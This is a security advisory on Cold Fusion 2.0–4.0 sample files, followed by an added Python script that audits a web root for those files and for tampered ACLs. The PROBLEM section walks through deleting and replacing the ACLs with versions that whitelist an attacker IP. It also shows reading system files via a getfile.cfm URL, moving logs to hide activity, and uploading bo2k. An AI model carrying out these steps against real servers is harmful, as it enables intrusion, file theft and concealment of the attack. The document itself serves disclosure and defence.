COMMAND

    Cold Fusion

SYSTEMS AFFECTED

    Cold Fusion 2.0 - 4.0

PROBLEM

    rot26 networks (nny) found the following.  The Cold Fusion ACLs
    referenced from other scripts are like any other file and may be
    deleted via the RequestTimeout deletion attack described by
    Mr. Klinsky in the recent l0pht advisory.  Some ACL "protected"
    files include those which may view the contents of files, upload
    new files to the system, and a raw code interpreter for remote
    execution of CF code, which may contain tags for registry
    modification.

    Using the expression evaluator, an attacker could back up the
    system logs for later comparison (upon attack) and modify them by
    uploading to the server and moving the files.  The attacker could
    then proceed to back up the expression evaluator (exprcalc.cfm
    specifically), also for later modification.  For other attacks
    which will not be focused on here, an attacker could also call
    sendmail.cfm without any arguments to return a system date/time
    stamp as well as directory structures.

    For the attack, have the expression evaluator delete (as explained
    in the l0pht advisory) the ACL cfdocs/expeval/check_ip.cfm.  Now
    delete the expression evaluator (exprcalc.cfm) and use
    openfile.cfm to upload a modded ACL along with a modded
    exprcalc.cfm.  The modded exprcalc.cfm is pretty basic: simply
    remove all lines past the </HTML>.  The final CFIF statement
    merely checks if the file is open and deletes it.  Again use
    openfile.cfm to upload a renamed original exprcalc.cfm; this
    provides us with a convenient way to do a view/delete combo.  For
    the sake of future examples the name exprcal.cfm will be used.  An
    attacker now has the ability to, among other things, execute raw
    code on the server, upload files at will, and delete files at
    will.  Previously the eval.cfm file was restricted via the
    check_ip.cfm ACL.  The modded check_ip.cfm contains the attacker's
    IP as well as the default ACL restriction of 127.0.0.1.

    There are more ACLs to be attacked, though.  Have the original,
    now renamed, expression evaluator delete the second and third ACLs:

        /cfdocs/exampleapp/publish/admin/application.cfm
        /cfdocs/exampleapp/email/application.cfm

    Again use openfile.cfm to upload modded ACLs and some scripts to
    move them to their proper dirs.  The ACL for the
    /cfdocs/exampleapp/email dir pretty much just needs to exist,
    maybe containing a few spaces.  Run the move scripts and now the
    admin and email dirs are owned.  Either use the expression
    evaluator to delete the move scripts or mod the sample move
    scripts included.  An attacker now has full access to the
    Administrator directory, which contains a nice packaged system
    file upload utility so we don't have to go through the openfile /
    dual exprcalc hassle.  Plus we now have a convenient file read
    utility.  For example:

        http://www.server.com/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini

    To facilitate anonymous web browsing or to defeat localhost trust
    one may wish to upload httpclient.cfm, which was found in Cold
    Fusion Application Server 3.x and mentioned in rfp's original
    advisory.  Now the new logs may be retrieved, diffed with the old
    ones, and modded to your delight.  Note: for further owning, bo2k
    could easily be uploaded and installed.

    An attacker has the ability to execute raw code, modify the
    registry, view system files, act as a trusted host to such
    services as IIS, upload files, delete files, circumvent log
    files, circumvent ACLs, and view web pages anonymously.  Sample
    code:

    check_ip.cfm modded code:

    < <CFIF #CGI.REMOTE_ADDR# IS NOT "127.0.0.1">

    > <CFIF #CGI.REMOTE_ADDR# IS NOT "127.0.0.1" AND #CGI.REMOTE_ADDR# IS NOT
    "$attackers_ip">

    application.cfm modded code:

    < <CFIF CGI.REMOTE_ADDR IS NOT "127.0.0.1">

    > <CFIF CGI.REMOTE_ADDR IS NOT "127.0.0.1" AND CGI.REMOTE_ADDR IS NOT
    "$attackers_ip">

    logfile-mover.cfm code:

    <CFFILE ACTION="Move"
       SOURCE="c:\inetpub\wwwroot\cfdocs\expeval\application.log"
       DESTINATION="c:\cfusion\log\">
    <CFFILE ACTION="Move"
       SOURCE="c:\inetpub\wwwroot\cfdocs\expeval\webserver.log"
       DESTINATION="c:\cfusion\log\">
    <CFFILE ACTION="Move"
       SOURCE="c:\inetpub\wwwroot\cfdocs\expeval\server.log"
       DESTINATION="c:\cfusion\log\">

    The other move scripts may easily be derived from this one, and
    having the scripts delete themselves would also be trivial.

SOLUTION

    Restrict access to or, preferably, delete the Cold Fusion sample
    files.  These include but are certainly not limited to:

        /cfdocs/expeval/exprcalc.cfm
        /cfdocs/expeval/sendmail.cfm
        /cfdocs/expeval/eval.cfm
        /cfdocs/expeval/openfile.cfm
        /cfdocs/expeval/displayopenedfile.cfm
        /cfdocs/exampleapp/email/getfile.cfm
        /cfdocs/exampleapp/publish/admin/addcontent.cfm

    Note: heed all warnings or none at all; if you merely delete
    exprcalc.cfm it may simply be re-uploaded via openfile.cfm /
    displayopenedfile.cfm.  Due to the nature of the previous attacks
    by rfp and Klinsky, if your /cfdocs/expeval/exprcalc.cfm is not
    found you MAY have already been attacked.  Follow the fix warning
    above and also make sure your ACLs have not been tampered with.
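    A defender-side check for this note, added here as an example and
    not part of the original advisory: it walks a web root for the
    sample files listed above, treats a missing exprcalc.cfm beside an
    otherwise present expeval directory as the warning sign described,
    and parses each ACL script's REMOTE_ADDR comparison so that any
    address other than 127.0.0.1, or an ACL blanked to a few spaces, is
    reported.  The web root argument, the finding strings and the
    regular expression are assumptions of this example.

```python
import os
import re

# Sample files listed in the SOLUTION section, relative to the web root.
SAMPLE_FILES = [
    "cfdocs/expeval/exprcalc.cfm",
    "cfdocs/expeval/sendmail.cfm",
    "cfdocs/expeval/eval.cfm",
    "cfdocs/expeval/openfile.cfm",
    "cfdocs/expeval/displayopenedfile.cfm",
    "cfdocs/exampleapp/email/getfile.cfm",
    "cfdocs/exampleapp/publish/admin/addcontent.cfm",
]
# ACL scripts whose REMOTE_ADDR check should only ever name 127.0.0.1.
ACL_FILES = [
    "cfdocs/expeval/check_ip.cfm",
    "cfdocs/exampleapp/publish/admin/application.cfm",
    "cfdocs/exampleapp/email/application.cfm",
]
# Every quoted address compared against CGI.REMOTE_ADDR ('#' delimiters optional).
ADDR_RE = re.compile(r'#?CGI\.REMOTE_ADDR#?\s+IS\s+NOT\s+"([^"]*)"', re.IGNORECASE)

def audit_acl_text(text):
    """Problems found in one ACL script's source; an empty list means it looks intact."""
    if not text.strip():  # an ACL that merely exists, holding a few spaces, guards nothing
        return ["acl is empty"]
    addrs = ADDR_RE.findall(text)
    if not addrs:
        return ["no REMOTE_ADDR check found"]
    return ["allows non-loopback address " + a for a in addrs if a != "127.0.0.1"]

def audit_webroot(webroot):
    """Map relative path -> finding for sample files and tampered ACLs under webroot."""
    findings = {}
    for rel in SAMPLE_FILES:
        if os.path.exists(os.path.join(webroot, rel)):
            findings[rel] = "sample file present; restrict or delete"
    # exprcalc.cfm gone while the rest of expeval remains is the advisory's warning sign.
    if (os.path.isdir(os.path.join(webroot, "cfdocs", "expeval"))
            and not os.path.exists(os.path.join(webroot, SAMPLE_FILES[0]))):
        findings[SAMPLE_FILES[0]] = "missing; the system may already have been attacked"
    for rel in ACL_FILES:
        path = os.path.join(webroot, rel)
        if os.path.exists(path):
            with open(path, encoding="latin-1") as fh:
                problems = audit_acl_text(fh.read())
            if problems:
                findings[rel] = "; ".join(problems)
    return findings
```

    Run audit_webroot() against the IIS web root (c:\inetpub\wwwroot in
    the advisory's paths) or a copied tree; any finding on an ACL file
    should be compared against the shipped original before trusting it.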